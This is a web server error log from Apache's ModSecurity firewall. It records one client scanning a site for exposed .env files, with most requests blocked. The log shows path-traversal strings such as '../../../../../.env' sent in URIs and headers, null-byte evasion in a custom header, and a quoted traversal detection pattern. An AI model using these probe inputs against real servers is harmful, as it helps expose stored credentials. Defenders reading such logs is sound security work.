[Tue May 12 05:10:32.108598 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.246:21654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/api/.env"] [unique_id "agKaKBfeipD4uoG21FoqKwAAABQ"]
[Tue May 12 05:10:32.108711 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.246:21654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/.env"] [unique_id "agKaKBfeipD4uoG21FoqKwAAABQ"]
[Tue May 12 05:10:32.108886 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.246:21654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/.env"] [unique_id "agKaKBfeipD4uoG21FoqKwAAABQ"]
[Tue May 12 05:10:32.119521 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKM1tk6y7yBJLpJozMwAAAJY"]
[Tue May 12 05:10:32.119562 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKM1tk6y7yBJLpJozMwAAAJY"]
[Tue May 12 05:10:32.119587 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKM1tk6y7yBJLpJozMwAAAJY"]
[Tue May 12 05:10:32.120054 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKM1tk6y7yBJLpJozMwAAAJY"]
[Tue May 12 05:10:32.120243 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKM1tk6y7yBJLpJozMwAAAJY"]
[Tue May 12 05:10:32.122145 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKDue9Sp-pIv_Bb69MAAAAUk"]
[Tue May 12 05:10:32.122202 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKDue9Sp-pIv_Bb69MAAAAUk"]
[Tue May 12 05:10:32.122312 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKDue9Sp-pIv_Bb69MAAAAUk"]
[Tue May 12 05:10:32.122489 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKDue9Sp-pIv_Bb69MAAAAUk"]
[Tue May 12 05:10:32.125373 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/public/.env"] [unique_id "agKaKNr1yOh9TvizeziYzAAAAEQ"]
[Tue May 12 05:10:32.125492 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/public/.env"] [unique_id "agKaKNr1yOh9TvizeziYzAAAAEQ"]
[Tue May 12 05:10:32.125673 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/public/.env"] [unique_id "agKaKNr1yOh9TvizeziYzAAAAEQ"]
[Tue May 12 05:10:32.126170 2026] [:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] File does not exist: /home/ixinabou/public_html/sysinfo.php
[Tue May 12 05:10:32.139325 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNAAAAJY"]
[Tue May 12 05:10:32.139366 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNAAAAJY"]
[Tue May 12 05:10:32.139389 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNAAAAJY"]
[Tue May 12 05:10:32.139549 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNAAAAJY"]
[Tue May 12 05:10:32.139601 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNAAAAJY"]
[Tue May 12 05:10:32.139628 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNAAAAJY"]
[Tue May 12 05:10:32.139957 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNAAAAJY"]
[Tue May 12 05:10:32.140160 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNAAAAJY"]
[Tue May 12 05:10:32.140591 2026] [core:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] AH10244: invalid URI path (/assets../../../.env)
[Tue May 12 05:10:32.143948 2026] [:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] File does not exist: /home/ixinabou/public_html/server-info.php
[Tue May 12 05:10:32.144127 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/storage/.env"] [unique_id "agKaKNr1yOh9TvizeziYzQAAAEQ"]
[Tue May 12 05:10:32.144242 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/storage/.env"] [unique_id "agKaKNr1yOh9TvizeziYzQAAAEQ"]
[Tue May 12 05:10:32.144423 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/storage/.env"] [unique_id "agKaKNr1yOh9TvizeziYzQAAAEQ"]
[Tue May 12 05:10:32.159178 2026] [core:error] [pid 1808852:tid 1808875] [client 45.148.10.246:21654] AH10244: invalid URI path (/assets../../../../.env)
[Tue May 12 05:10:32.159442 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNQAAAJY"]
[Tue May 12 05:10:32.159479 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNQAAAJY"]
[Tue May 12 05:10:32.159502 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNQAAAJY"]
[Tue May 12 05:10:32.159667 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNQAAAJY"]
[Tue May 12 05:10:32.159717 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNQAAAJY"]
[Tue May 12 05:10:32.159744 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNQAAAJY"]
[Tue May 12 05:10:32.160062 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNQAAAJY"]
[Tue May 12 05:10:32.160257 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNQAAAJY"]
[Tue May 12 05:10:32.163267 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/www/.env"] [unique_id "agKaKNr1yOh9TvizeziYzgAAAEQ"]
[Tue May 12 05:10:32.163380 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/www/.env"] [unique_id "agKaKNr1yOh9TvizeziYzgAAAEQ"]
